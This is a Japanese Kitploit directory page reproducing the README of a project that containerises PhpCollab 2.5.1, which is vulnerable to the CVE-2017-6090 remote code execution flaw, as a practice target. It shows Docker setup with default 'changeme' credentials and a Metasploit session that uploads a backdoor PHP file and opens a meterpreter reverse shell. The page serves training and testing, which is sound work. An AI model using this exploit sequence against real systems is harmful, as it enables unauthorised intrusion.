Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
exploit-CVE-2017-6090 — コンテナ化されたエクスプロイト可能なPhpCollab | Kitploit
ツール/GitHubGitHub/jlk/exploit-cve-2017-6090
コンテナセキュリティエクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

コンテナ化されたエクスプロイト可能なPhpCollab

リポジトリを見る
18年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

コンテナ化された悪用可能な CVE-2017-6090

Docker Pulls License

このプロジェクトは、CVE-2017-6090 で詳細が公開されているリモートコード実行の脆弱性を含む PhpCollab 2.5.1 を実行するコンテナを構築します。さらに、そのコンテナと mysql を起動してデモを行うための docker-compose ファイルがあり、悪用手順は以下に示します。

ビルド

docker build -t containername . またはイメージ jlkinsel/exploit-cve-2017-6090 を使用します。

実行と設定

これを立ち上げる最も簡単な方法は、同梱の docker-compose.yml ファイルを使うことです。もし暇になったら、または興味を示す人がいれば、Kubernetes デプロイメントや Helm チャートを作成するかもしれません。

それでは、始めましょう:

root@kitploit:~
docker-compose up

ここまでは順調です! 次に、phpcollab をデータベースを使用するように設定し、デフォルトの管理者パスワードを設定する必要があります。この自動化を(少しだけ)試みましたが、しかし…まあ…あなたはブラウザーの使い方をご存じのようですので…

  • http://localhost:8088 を開きます
  • GPL の下部までスクロールし、「オフラインインストール」チェックボックスをクリックしてから ステップ 2 をクリックします
  • 各フィールドに以下のデータを入力し、保存 をクリックします:

最後に、ログインして色々見て回ることもできますが、エクスプロイトには必要ありません。

注意

この Docker 構成はストレージに関して特別なことをしていないことに注意してください。mysql データベースを永続化したい場合は、docker-compose.yml の mysql サービス定義にボリューム定義を追加する必要があります。例は mariadb docker hub ページ を参照してください。

エクスプロイト

まず、上記の 実行と設定 に従ってアプリケーションを起動してください。

このプロジェクトにはエクスプロイトを追加していません。なぜなら、そう、Metasploit があるからです。

MSF は初めてですか? 今起動したコンテナをエクスプロイトする簡単な概要は次のとおりです:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

起動には数分かかります。remnux/metasploit の docker hub ページではボリュームの使用について説明しているので、今後はそれほど時間がかからないでしょう。しかし、今はこのまま進めましょう!

シェルプロンプトが表示されたら、続けましょう:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

この時点で、あなたは侵入しており、ゲームを始めることができます。

注意

このディレクトリの名前が "exploit-CVE-2017-6090" 以外の場合は、上記の --network コマンドを変更する必要があります。

また、外部では 8088 ですが、msfconsole でリモートポートを 80 に設定しました。Metasploit コンテナは phpcollab コンテナと同じネットワーク上にあります。

ツールをダウンロード
項目
値
データベースサーバーmysql
データベースログインphpcollab
データベースパスワードchangeme
データベース名phpcollab
通知False
管理者パスワードchangeme (または任意の値